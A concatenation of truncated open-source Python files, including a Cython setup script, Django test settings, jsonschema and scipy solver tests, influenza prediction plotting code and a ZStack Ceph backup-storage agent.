if 'setuptools' in sys.modules:
setuptools_extra_args['zip_safe'] = False
setuptools_extra_args['entry_points'] = {
'console_scripts': [
'cython = Cython.Compiler.Main:setuptools_main',
]
}
scripts = []
else:
if os.name == "posix":
scripts = ["bin/cython"]
if include_debugger:
scripts.append('bin/cygdb')
else:
scripts = ["cython.py"]
if include_debugger:
scripts.append('cygdb.py')
def compile_cython_modules(profile=False, compile_more=False, cython_with_refnanny=False):
source_root = os.path.abspath(os.path.dirname(__file__))
compiled_modules = ["Cython.Plex.Scanners",
"Cython.Plex.Actions",
"Cython.Compiler.Lexicon",
"Cython.Compiler.Scanning",
"Cython.Compiler.Parsing",
"Cython.Compiler.Visitor",
"Cython.Compiler.Code",
"Cython.Runtime.refnanny",]
if compile_more:
compiled_modules.extend([
"Cython.Compiler.ParseTreeTransforms",
"Cython.Compiler.Nodes",
"Cython.Compiler.ExprNodes",
"Cython.Compiler.ModuleNode",
"Cython.Compiler.Optimize",
])
defines = []
if cython_with_refnanny:
defines.append(('CYTHON_REFNANNY', '1'))
extensions = []
if sys.version_info[0] >= 3:
from Cython.Distutils import build_ext as build_ext_orig
for module in compiled_modules:
source_file = os.path.join(source_root, *module.split('.'))
if os.path.exists(source_file + ".py"):
pyx_source_file = source_file + ".py"
else:
pyx_source_file = source_file + ".pyx"
dep_files = []
if os.path.exists(source_file + '.pxd'):
dep_files.append(source_file + '.pxd')
if '.refnanny' in module:
defines_for_module = []
else:
defines_for_module = defines
extensions.append(
Extension(module, sources = [pyx_source_file],
define_macros = defines_for_module,
depends = dep_files)
)
class build_ext(build_ext_orig):
# we must keep the original modules alive to make sure
# their code keeps working when we remove them from
# sys.modules
dead_modules = []
def build_extensions(self):
# add path where 2to3 installed the transformed sources
# and make sure Python (re-)imports them from there
already_imported = [ module for module in sys.modules
if module == 'Cython' or module.startswith('Cython.') ]
keep_alive = self.dead_modules.append
for module in already_imported:
keep_alive(sys.modules[module])
del sys.modules[module]
sys.path.insert(0, os.path.join(source_root, self.build_lib))
if profile:
from Cython.Compiler.Options import directive_defaults
directive_defaults['profile'] = True
print("Enabled profiling for the Cython binary modules")
build_ext_orig.build_extensions(self)
setup_args['ext_modules'] = extensions
add_command_class("build_ext", build_ext)
else: # Python 2.x
from distutils.command.build_ext import build_ext as build_ext_orig
try:
class build_ext(build_ext_orig):
def build_extension(self, ext, *args, **kargs):
try:
build_ext_orig.build_extension(self, ext, *args, **kargs)
except StandardError:
print("Compilation of '%s' failed" % ext.sources[0])
from Cython.Compiler.Main import compile
from Cython import Utils
if profile:
from Cython.Compiler.Options import directive_defaults
directive_defaults['profile'] = True
print("Enabled profiling for the Cython binary modules")
source_root = os.path.dirname(__file__)
for module in compiled_modules:
source_file = os.path.join(source_root, *module.split('.'))
if os.path.exists(source_file + ".py"):
pyx_source_file = source_file + ".py"
else:
pyx_source_file = source_file + ".pyx"
c_source_file = source_file + ".c"
source_is_newer = False
if not os.path.exists(c_source_file):
source_is_newer = True
else:
c_last_modified = Utils.modification_time(c_source_file)
if Utils.file_newer_than(pyx_source_file, c_last_modified):
source_is_newer = True
else:
pxd_source_file = source_file + ".pxd"
if os.path.exists(pxd_source_file) and Utils.file_newer_than(pxd_source_file, c_last_modified):
source_is_newer = True
if source_is_newer:
print("Compiling module %s ..." % module)
result = compile(pyx_source_file)
c_source_file = result.c_file
if c_source_file:
# Py2 distutils can't handle unicode file paths
if isinstance(c_source_file, unicode):
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding |
Egregors/django-autoslug-field | testautoslug/settings.py | Python | mit | 3,357 | 0.002085 | # Django settings for testautoslug project.
import os
PROJECT_ROOT = os.path.dirname(__file__)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'dev.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = '44mxeh8nkm^ycwef-eznwgk&8_lwc!j9r)h3y_^ypz1iom18pa'
# List of callables that kno | w how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.cont | rib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'testautoslug.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'testapp',
)
|
wikimedia/operations-debs-python-jsonschema | tests.py | Python | mit | 27,331 | 0.003439 | from __future__ import unicode_literals
from decimal import Decimal
import contextlib
import glob
import io
import json
import os
import re
import subprocess
import sys
if sys.version_info[:2] < (2, 7): # pragma: no cover
import unittest2 as unittest
else:
import unittest
try:
from unittest import mock
except ImportError:
import mock
try:
from sys import pypy_version_info
except ImportError:
pypy_version_info = None
from jsonschema import (
PY3, FormatError, SchemaError, UnknownType, ValidationError, ErrorTree,
Draft3Validator, Draft4Validator, FormatChecker, RefResolver,
ValidatorMixin, draft3_format_checker, draft4_format_checker, validate,
)
THIS_DIR = os.path.dirname(__file__)
TESTS_DIR = os.path.join(THIS_DIR, "json", "tests" | )
JSONSCHEMA_SUITE = os.path.join(THIS_DIR, "json", "bin", "jsonschema_suite")
REMOTES = subprocess.Popen(
["py | thon", JSONSCHEMA_SUITE, "remotes"], stdout=subprocess.PIPE,
).stdout
if PY3:
REMOTES = io.TextIOWrapper(REMOTES)
REMOTES = json.load(REMOTES)
def make_case(schema, data, valid):
if valid:
def test_case(self):
kwargs = getattr(self, "validator_kwargs", {})
validate(data, schema, cls=self.validator_class, **kwargs)
else:
def test_case(self):
kwargs = getattr(self, "validator_kwargs", {})
with self.assertRaises(ValidationError):
validate(data, schema, cls=self.validator_class, **kwargs)
return test_case
def load_json_cases(tests_glob, ignore_glob="", basedir=TESTS_DIR, skip=None):
if ignore_glob:
ignore_glob = os.path.join(basedir, ignore_glob)
def add_test_methods(test_class):
ignored = set(glob.iglob(ignore_glob))
for filename in glob.iglob(os.path.join(basedir, tests_glob)):
if filename in ignored:
continue
validating, _ = os.path.splitext(os.path.basename(filename))
with open(filename) as test_file:
data = json.load(test_file)
for case in data:
for test in case["tests"]:
a_test = make_case(
case["schema"],
test["data"],
test["valid"],
)
test_name = "test_%s_%s" % (
validating,
re.sub(r"[\W ]+", "_", test["description"]),
)
if not PY3:
test_name = test_name.encode("utf-8")
a_test.__name__ = test_name
if skip is not None and skip(case):
a_test = unittest.skip("Checker not present.")(
a_test
)
setattr(test_class, test_name, a_test)
return test_class
return add_test_methods
class TypesMixin(object):
@unittest.skipIf(PY3, "In Python 3 json.load always produces unicode")
def test_string_a_bytestring_is_a_string(self):
self.validator_class({"type" : "string"}).validate(b"foo")
class DecimalMixin(object):
def test_it_can_validate_with_decimals(self):
schema = {"type" : "number"}
validator = self.validator_class(
schema, types={"number" : (int, float, Decimal)}
)
for valid in [1, 1.1, Decimal(1) / Decimal(8)]:
validator.validate(valid)
for invalid in ["foo", {}, [], True, None]:
with self.assertRaises(ValidationError):
validator.validate(invalid)
def missing_format(checker):
def missing_format(case):
format = case["schema"].get("format")
return format not in checker.checkers or (
# datetime.datetime is overzealous about typechecking in <=1.9
format == "date-time" and
pypy_version_info is not None and
pypy_version_info[:2] <= (1, 9)
)
return missing_format
class FormatMixin(object):
def test_it_returns_true_for_formats_it_does_not_know_about(self):
validator = self.validator_class(
{"format" : "carrot"}, format_checker=FormatChecker(),
)
validator.validate("bugs")
def test_it_does_not_validate_formats_by_default(self):
validator = self.validator_class({})
self.assertIsNone(validator.format_checker)
def test_it_validates_formats_if_a_checker_is_provided(self):
checker = mock.Mock(spec=FormatChecker)
validator = self.validator_class(
{"format" : "foo"}, format_checker=checker,
)
validator.validate("bar")
checker.check.assert_called_once_with("bar", "foo")
cause = ValueError()
checker.check.side_effect = FormatError('aoeu', cause=cause)
with self.assertRaises(ValidationError) as cm:
validator.validate("bar")
# Make sure original cause is attached
self.assertIs(cm.exception.cause, cause)
@load_json_cases(
"draft3/*.json", ignore_glob=os.path.join("draft3", "refRemote.json")
)
@load_json_cases(
"draft3/optional/format.json", skip=missing_format(draft3_format_checker)
)
@load_json_cases("draft3/optional/bignum.json")
@load_json_cases("draft3/optional/zeroTerminatedFloats.json")
class TestDraft3(
unittest.TestCase, TypesMixin, DecimalMixin, FormatMixin
):
validator_class = Draft3Validator
validator_kwargs = {"format_checker" : draft3_format_checker}
def test_any_type_is_valid_for_type_any(self):
validator = self.validator_class({"type" : "any"})
validator.validate(mock.Mock())
# TODO: we're in need of more meta schema tests
def test_invalid_properties(self):
with self.assertRaises(SchemaError):
validate({}, {"properties": {"test": True}},
cls=self.validator_class)
def test_minItems_invalid_string(self):
with self.assertRaises(SchemaError):
# needs to be an integer
validate([1], {"minItems" : "1"}, cls=self.validator_class)
@load_json_cases(
"draft4/*.json", ignore_glob=os.path.join("draft4", "refRemote.json")
)
@load_json_cases(
"draft4/optional/format.json", skip=missing_format(draft4_format_checker)
)
@load_json_cases("draft4/optional/bignum.json")
@load_json_cases("draft4/optional/zeroTerminatedFloats.json")
class TestDraft4(
unittest.TestCase, TypesMixin, DecimalMixin, FormatMixin
):
validator_class = Draft4Validator
validator_kwargs = {"format_checker" : draft4_format_checker}
# TODO: we're in need of more meta schema tests
def test_invalid_properties(self):
with self.assertRaises(SchemaError):
validate({}, {"properties": {"test": True}},
cls=self.validator_class)
def test_minItems_invalid_string(self):
with self.assertRaises(SchemaError):
# needs to be an integer
validate([1], {"minItems" : "1"}, cls=self.validator_class)
class RemoteRefResolution(unittest.TestCase):
def setUp(self):
patch = mock.patch("jsonschema.requests")
requests = patch.start()
requests.get.side_effect = self.resolve
self.addCleanup(patch.stop)
def resolve(self, reference):
_, _, reference = reference.partition("http://localhost:1234/")
return mock.Mock(**{"json.return_value" : REMOTES.get(reference)})
@load_json_cases("draft3/refRemote.json")
class Draft3RemoteResolution(RemoteRefResolution):
validator_class = Draft3Validator
@load_json_cases("draft4/refRemote.json")
class Draft4RemoteResolution(RemoteRefResolution):
validator_class = Draft4Validator
class TestIterErrors(unittest.TestCase):
def setUp(self):
self.validator = Draft3Validator({})
def test_iter_errors(self):
instance = [1, 2]
schema = {
"disallow" : "array",
"enum" : [["a", "b", "c"], ["d", "e", "f"]],
"minItems" : 3
}
got = (str(e) for e in self.validator.iter_er |
GeoMatDigital/django-geomat | geomat/stein/migrations/0055_delete_classification_model.py | Python | bsd-3-clause | 313 | 0 | # Generated by Django 2. | 0.2 on 2018-02-03 17:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stein', '0054_delete_classification_relation'),
]
operations = [
migrations.DeleteModel(
name='Classification',
| ),
]
|
rneher/FitnessInference | flu/figure_scripts/flu_figures_inference.py | Python | mit | 12,931 | 0.024205 |
#########################################################################################
#
# author: Richard Neher
# email: richard.neher@tuebingen.mpg.de
#
# Reference: Richard A. Neher, Colin A Russell, Boris I Shraiman.
# "Predicting evolution from the shape of genealogical trees"
#
##################################################
#!/ebio/ag-neher/share/programs/bin/python2.7
#
#script that reads in precomputed repeated prediction of influenza and
#and plots the average predictions using external, internal nodes for each year
#in addition, it compares this to predictions rewarding Koel et al mutations
#and to predictions using explicit temporal information (frequency dynamics within
#clades)
#
import glob,a | rgparse,sys
sys.path.append('/ebio/ag-neher/share/users/rneher/FluPrediction_code/flu/src')
import test_flu_prediction as test_flu
import analysis_utils as AU
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
file_formats = [] #['.pdf', '.svg']
# set matplotlib plotting parameters
plt.rcParams.update(test_flu.mpl_params)
figure_folder = '../figures_ms/'
# set flutype, prediction regions, and basic parameters
parser = test_flu.make_flu_parser()
params=par | ser.parse_args()
params.year='????'
params.sample_size = 100
D = params.diffusion = 0.5
gamma = params.gamma = 3.0
omega = params.omega = 0.001
params.collapse = False
metric = 'nuc'
# make file identifiers
base_name, name_mod = test_flu.get_fname(params)
#remove year
base_name = '_'.join(base_name.split('_')[:1]+base_name.split('_')[2:])
base_name = base_name.replace('_????','')
# load data (with Koel boost and without), save in dictionary
prediction_distances={}
normed_distances={}
for boost in [0.0,0.5,1.0]:
params.boost = boost
years,tmp_pred, tmp_normed = AU.load_prediction_data(params, metric)
prediction_distances.update(tmp_pred)
normed_distances.update(tmp_normed)
##################################################################################
## main figure 3c
##################################################################################
# make figure
plt.figure(figsize = (12,6))
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal and L&L predictions
for yi,year in enumerate(years):
plt.gca().add_patch(plt.Rectangle([year-0.5, 0.2], 1.0, 1.8, color='k', alpha=0.05*(1+np.mod(year,2))))
plt.plot([year-0.5, year+0.5], [prediction_distances[('minimal',boost,'minimal')][yi],
prediction_distances[('minimal',boost,'minimal')][yi]],
lw=2, c='k', ls = '--')
for method, sym, col, shift, label in [[('fitness,terminal nodes',0.0,'pred(T)'), 's', 'k', -0.25, 'top ranked terminal nodes'],
[('fitness,internal nodes',0.0,'pred(I)'), 'd', 'r', 0.25, 'top ranked internal nodes ']]:
plt.plot(years+shift, prediction_distances[method], sym, c= col, ms=8,
label=label) #+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
# set limits, ticks, legends
plt.ylim([0.2, 1.7])
plt.yticks([0.5, 1, 1.5])
plt.xlim([min(years)-0.5,max(years)+0.5])
plt.xticks(years[::2])
plt.ylabel(r'$\Delta(\mathrm{prediction})$ to next season')
plt.xlabel('year')
plt.legend(loc=9, ncol=1,numpoints=1)
#add panel label
plt.text(-0.06,0.95,'C', transform = plt.gca().transAxes, fontsize = 36)
#save figure
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig4C_'+base_name+'_'+name_mod+'_internal_external_revised'+ff)
##################################################################################
## Fig 4: compare bootstrap distributions of prediction results
## Bootstrapping is over years
##
##################################################################################
#sorted_methods = [a for a in sorted(normed_distances.items(), key=lambda x:x[1]) if a[0][0]
# not in ['ladder rank', 'date', 'expansion, internal nodes', 'L&L'] or a[0][1]==0.0]
tick_labels = { ('fitness,internal nodes', 0.0, 'pred(I)'):'internal',
('fitness,terminal nodes', 0.0, 'pred(T)'):'terminal',
('expansion, internal nodes', 0.0, 'growth'):'growth',
('L&L', 0.0, r'L\&L'):r'L\&L',
('ladder rank',0.0, 'ladder rank'):'ladder rank'}
sorted_methods = [a for a in sorted(normed_distances.items(), key=lambda x:x[1][0]) if a[0][:2] in
[#('internal and expansion', 0.5),
#('internal and expansion', 0.0),
('fitness,internal nodes', 0.0),
('fitness,terminal nodes', 0.0),
('expansion, internal nodes', 0.0),
('L&L', 0.0),
('ladder rank',0.0)] ]
plt.figure(figsize = (8,5))
plt.boxplot([a[1][1][-1] for a in sorted_methods],positions = range(len(sorted_methods)))
#plt.xticks(range(len(sorted_methods)), [a[0][-1] for a in sorted_methods], rotation=30, horizontalalignment='right')
plt.xticks(range(len(sorted_methods)), [tick_labels[a[0]] for a in sorted_methods], rotation=30, horizontalalignment='right')
plt.ylabel(r'distance $\bar{d}$ to next season')
plt.xlim([-0.5, len(sorted_methods)-0.5])
plt.grid()
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig5_'+base_name+'_'+name_mod+'_method_comparison'+ff)
##################################################################################
## Fig 3c-1 Comparison to L&L
##################################################################################
# make figure
plt.figure(figsize = (12,6))
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal
for yi,year in enumerate(years):
plt.gca().add_patch(plt.Rectangle([year-0.5, 0.2], 1.0, 1.8, color='k', alpha=0.05*(1+np.mod(year,2))))
plt.plot([year-0.5, year+0.5], [prediction_distances[('minimal',boost,'minimal')][yi],
prediction_distances[('minimal',boost,'minimal')][yi]],
lw=2, c='k', ls = '--')
method, sym, col, shift, label = ('fitness,terminal nodes',0.0,'pred(T)'), 's', 'k', -0.25, 'top ranked terminal nodes '
plt.plot(years+shift, prediction_distances[method], sym, c= col, ms=8, label=label+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
method, sym, col, shift, label = ('L&L',0.0,'L\&L'), 'o', 'r', 0.25, r'prediction by \L{}uksza and L\"assig'
plt.plot(years[AU.laessig_years(years)]+shift, prediction_distances[method][AU.laessig_years(years)],
sym, c= col, ms=8, label=label+r' $\bar{d}='+str(np.round(normed_distances[method][0],2))+'$')
# set limits, ticks, legends
plt.ylim([0.2, 1.7])
plt.yticks([0.5, 1, 1.5])
plt.xlim([min(years)-0.5,max(years)+0.5])
plt.xticks(years[::2])
plt.ylabel(r'$\Delta(\mathrm{prediction})$ to next season')
#plt.ylabel('nucleodide distance to next season\n(relative to average)')
plt.xlabel('year')
plt.legend(loc=9, ncol=1,numpoints=1)
#add panel label
plt.text(0.02,0.9,'Fig.~3-S1', transform = plt.gca().transAxes, fontsize = 20)
#save figure
plt.tight_layout()
for ff in file_formats:
plt.savefig(figure_folder+'Fig4C_s1_'+base_name+'_'+name_mod+'_LL_external_revised'+ff)
##################################################################################
## Fig 3c-2 inclusion of Koel boost -- no temporal compnent
##################################################################################
# make figure
plt.figure(figsize = (12,6))
plt.title(r'Rewarding Koel mutations -- w/o calde growth estimate: $\bar{d}='
+', '.join(map(str,[np.round(normed_distances[('fitness,internal nodes',boost,'pred(I)')][0],2)
for boost in [0.0, 0.5, 1.0]]))+'$ for $\delta = 0, 0.5, 1$', fontsize = 16)
# plot line for random expection
plt.plot([min(years)-0.5,max(years)+0.5], [1,1], lw=2, c='k')
# add shaded boxes and optimal
method, sym, col, shift, label = ('fitness,internal nodes',0.0,'pred(I)'), 's', 'k', -0.25, 'pred(I)+Koel boost'
for yi,year in enumerate(years):
plt.gca().add_ |
mingjian2049/zstack-utility | cephbackupstorage/cephbackupstorage/cephagent.py | Python | apache-2.0 | 21,260 | 0.003057 | __author__ = 'frank'
import os
import os.path
import pprint
import traceback
import urllib2
import zstacklib.utils.daemon as daemon
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
from zstacklib.utils import log
from zstacklib.utils.bash import *
from zstacklib.utils.report import Report
from zstacklib.utils import shell
from zstacklib.utils.rollback import rollback, rollbackable
logger = log.get_logger(__name__)
class AgentResponse(object):
def __init__(self, success=True, error=None):
self.success = success
self.error = error if error else ''
self.totalCapacity = None
self.availableCapacity = None
class InitRsp(AgentResponse):
def __init__(self):
super(InitRsp, self).__init__()
self.fsid = None
class DownloadRsp(AgentResponse):
def __init__(self):
super(DownloadRsp, self).__init__()
self.size = None
self.actualSize = None
class GetImageSizeRsp(AgentResponse):
def __init__(self):
super(GetImageSizeRsp, self).__init__()
self.size = None
self.actualSize = None
class PingRsp(AgentResponse):
def __init__(self):
super(PingRsp, self).__init__()
self.failure = None
class GetFactsRsp(AgentResponse):
def __init__(self):
super(GetFactsRsp, self).__init__()
self.fsid = None
self.monAddr = None
class DeleteImageMetaDataResponse(AgentResponse):
def __init__(self):
super(DeleteImageMetaDataResponse,self).__init__()
self.ret = None
class WriteImageMetaDataResponse(AgentResponse):
def __init__(self):
super(WriteImageMetaDataResponse,self).__init__()
class GetImageMetaDataResponse(AgentResponse):
def __init__(self):
super(GetImageMetaDataResponse,self).__init__()
self.imagesMetadata= None
class DumpImageMetaDataToFileResponse(AgentResponse):
def __init__(self):
super(DumpImageMetaDataToFileResponse,self).__init__()
class CheckImageMetaDataFileExistResponse(AgentResponse):
def __init__(self):
super(CheckImageMetaDataFileExistResponse, self).__init__()
self.backupStorageMetaFileName = None
self.exist = None
def replyerror(func):
@functools.wraps(func)
def wrap(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
content = traceback.format_exc()
| err = '%s\n%s\nargs:%s' % (str(e), content, pprint.pformat([args, kwargs]))
rsp = AgentResponse()
rsp.success = False
rsp.error = str(e)
logger.warn(err)
return jsonobject.dumps(rsp)
return wrap
class CephAgent(object):
INIT_PATH = "/ceph/backupstorage/init"
DOWNLOAD_IMAGE_PATH = "/ceph/backupstorage/image/d | ownload"
DELETE_IMAGE_PATH = "/ceph/backupstorage/image/delete"
PING_PATH = "/ceph/backupstorage/ping"
ECHO_PATH = "/ceph/backupstorage/echo"
GET_IMAGE_SIZE_PATH = "/ceph/backupstorage/image/getsize"
GET_FACTS = "/ceph/backupstorage/facts"
GET_IMAGES_METADATA = "/ceph/backupstorage/getimagesmetadata"
DELETE_IMAGES_METADATA = "/ceph/backupstorage/deleteimagesmetadata"
DUMP_IMAGE_METADATA_TO_FILE = "/ceph/backupstorage/dumpimagemetadatatofile"
CHECK_IMAGE_METADATA_FILE_EXIST = "/ceph/backupstorage/checkimagemetadatafileexist"
CHECK_POOL_PATH = "/ceph/backupstorage/checkpool"
CEPH_METADATA_FILE = "bs_ceph_info.json"
http_server = http.HttpServer(port=7761)
http_server.logfile_path = log.get_logfile_path()
def __init__(self):
self.http_server.register_async_uri(self.INIT_PATH, self.init)
self.http_server.register_async_uri(self.DOWNLOAD_IMAGE_PATH, self.download)
self.http_server.register_async_uri(self.DELETE_IMAGE_PATH, self.delete)
self.http_server.register_async_uri(self.PING_PATH, self.ping)
self.http_server.register_async_uri(self.GET_IMAGE_SIZE_PATH, self.get_image_size)
self.http_server.register_async_uri(self.GET_FACTS, self.get_facts)
self.http_server.register_sync_uri(self.ECHO_PATH, self.echo)
self.http_server.register_async_uri(self.GET_IMAGES_METADATA, self.get_images_metadata)
self.http_server.register_async_uri(self.CHECK_IMAGE_METADATA_FILE_EXIST, self.check_image_metadata_file_exist)
self.http_server.register_async_uri(self.DUMP_IMAGE_METADATA_TO_FILE, self.dump_image_metadata_to_file)
self.http_server.register_async_uri(self.DELETE_IMAGES_METADATA, self.delete_image_metadata_from_file)
self.http_server.register_async_uri(self.CHECK_POOL_PATH, self.check_pool)
def _set_capacity_to_response(self, rsp):
o = shell.call('ceph df -f json')
df = jsonobject.loads(o)
if df.stats.total_bytes__ is not None :
total = long(df.stats.total_bytes_)
elif df.stats.total_space__ is not None:
total = long(df.stats.total_space__) * 1024
else:
raise Exception('unknown ceph df output: %s' % o)
if df.stats.total_avail_bytes__ is not None:
avail = long(df.stats.total_avail_bytes_)
elif df.stats.total_avail__ is not None:
avail = long(df.stats.total_avail_) * 1024
else:
raise Exception('unknown ceph df output: %s' % o)
rsp.totalCapacity = total
rsp.availableCapacity = avail
@replyerror
def echo(self, req):
logger.debug('get echoed')
return ''
def _normalize_install_path(self, path):
return path.lstrip('ceph:').lstrip('//')
def _get_file_size(self, path):
o = shell.call('rbd --format json info %s' % path)
o = jsonobject.loads(o)
return long(o.size_)
@replyerror
def get_image_size(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
rsp = GetImageSizeRsp()
path = self._normalize_install_path(cmd.installPath)
rsp.size = self._get_file_size(path)
return jsonobject.dumps(rsp)
@in_bash
@replyerror
def get_images_metadata(self, req):
logger.debug("meilei: get images metadata")
cmd = jsonobject.loads(req[http.REQUEST_BODY])
pool_name = cmd.poolName
bs_uuid = pool_name.split("-")[-1]
valid_images_info = ""
self.get_metadata_file(bs_uuid, self.CEPH_METADATA_FILE)
last_image_install_path = ""
bs_ceph_info_file = "/tmp/%s" % self.CEPH_METADATA_FILE
with open(bs_ceph_info_file) as fd:
images_info = fd.read()
for image_info in images_info.split('\n'):
if image_info != '':
image_json = jsonobject.loads(image_info)
# todo support multiple bs
image_uuid = image_json['uuid']
image_install_path = image_json["backupStorageRefs"][0]["installPath"]
ret = bash_r("rbd info %s" % image_install_path.split("//")[1])
if ret == 0 :
logger.info("Check image %s install path %s successfully!" % (image_uuid, image_install_path))
if image_install_path != last_image_install_path:
valid_images_info = image_info + '\n' + valid_images_info
last_image_install_path = image_install_path
else:
logger.warn("Image %s install path %s is invalid!" % (image_uuid, image_install_path))
self.put_metadata_file(bs_uuid, self.CEPH_METADATA_FILE)
rsp = GetImageMetaDataResponse()
rsp.imagesMetadata= valid_images_info
return jsonobject.dumps(rsp)
@in_bash
@replyerror
def check_image_metadata_file_exist(self, req):
cmd = jsonobject.loads(req[http.REQUEST_BODY])
pool_name = cmd.poolName
bs_uuid = pool_name.split("-")[-1]
rsp = CheckImageMetaDataFileExistResponse()
rsp.backupStorageMetaFileName = self.CEPH_METADATA_FILE
ret, output = bash_ro("rados -p bak-t-%s stat %s" % (bs_uuid,self.CEPH_METADATA_FILE))
|
xxHACKYHACKYXx/hackathon-dpse | Rule booklet in Python/Setup.py | Python | gpl-2.0 | 875 | 0.012571 | """In the case that the Setup.py file fails to execute, please manually install the following packages,
or execute the requirements.sh script."""
# Installing Requirements: #
# pip install git+https://github.com/pwal | ler/pyfiglet #
# pip install colorama #
# pip install termcolor | #
# pip install blessings #
from distutils.core import setup
setup(name='DPS East Hackathon Rule booklet.',
version='1.0',
description='DPS East Hackathon Rule booklet.',
author='thel3l',
author_email='i.rithwik@protonmail.com',
url='https://www.github.com/thel3l/hackathon-dpse',
packages=['distutils', 'distutils.command', 'pyfiglet', 'colorama', 'termcolor', 'blessings'],
)
|
ygenc/onlineLDA | onlineldavb_new/build/scipy/scipy/optimize/tests/test_nonlin.py | Python | gpl-3.0 | 11,990 | 0.009091 | """ Unit tests for nonlinear solvers
Author: Ondrej Certik
May 2007
"""
from numpy.testing import assert_, dec, TestCase, run_module_suite
from scipy.optimize import nonlin
from numpy import matrix, diag, dot
from numpy.linalg import inv
import numpy as np
SOLVERS = [nonlin.anderson, nonlin.diagbroyden, nonlin.linearmixing,
nonlin.excitingmixing, nonlin.broyden1, nonlin.broyden2,
nonlin.newton_krylov]
MUST_WORK = [nonlin.anderson, nonlin.broyden1, nonlin.broyden2,
nonlin.newton_krylov]
#-------------------------------------------------------------------------------
# Test problems
#-------------------------------------------------------------------------------
def F(x):
x = np.asmatrix(x).T
d = matrix(diag([3,2,1.5,1,0.5]))
c = 0.01
f = -d*x - c*float(x.T*x)*x
return f
F.xin = [1,1,1,1,1]
F.KNOWN_BAD = []
def F2(x):
return x
F2.xin = [1,2,3,4,5,6]
F2.KNOWN_BAD = [nonlin.linearmixing, nonlin.excitingmixing]
def F3(x):
A = np.mat('-2 1 0; 1 -2 1; 0 1 -2')
b = np.mat('1 2 3')
return np.dot(A, x) - b
F3.xin = [1,2,3]
F3.KNOWN_BAD = []
def F4_powell(x):
A = 1e4
return [A*x[0]*x[1] - 1, np.exp(-x[0]) + np.exp(-x[1]) - (1 + 1/A)]
F4_powell.xin = [-1, -2]
F4_powell.KNOWN_BAD = [nonlin.linearmixing, nonlin.excitingmixing,
nonlin.diagbroyden]
from test_minpack import TestFSolve as F5_class
F5_object = F5_class()
def F5(x):
return F5_object.pressure_network(x, 4, np.array([.5, .5, .5, .5]))
F5.xin = [2., 0, 2, 0]
F5.KNOWN_BAD = [nonlin.excitingmixing, nonlin.linearmixing, nonlin.diagbroyden]
def F6(x):
x1, x2 = x
J0 = np.array([[ -4.256 , 14.7 ],
[ 0.8394989 , 0.59964207]])
v = np.array([(x1 + 3) * (x2**5 - 7) + 3*6,
np.sin(x2 * np.exp(x1) - 1)])
return -np.linalg.solve(J0, v)
F6.xin = [-0.5, 1.4]
F6.KNOWN_BAD = [nonlin.excitingmixing, nonlin.linearmixing, nonlin.diagbroyden]
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
class TestNonlin(object):
"""
Check the Broyden methods for a few test problems.
broyden1, broyden2, and newton_krylov must succeed for
all functions. Some of the others don't -- tests in KNOWN_BAD are skipped.
"""
def _check_func(self, f, func, f_tol=1e-2):
x = func(f, f.xin, f_tol=f_tol, maxiter=200, verbose=0)
assert_(np.absolute(f(x)).max() < f_tol)
@dec.knownfailureif(True)
def _check_func_fail(self, *a, **kw):
pass
def test_problem(self):
for f in [F, F2, F3, F4_powell, F5, F6]:
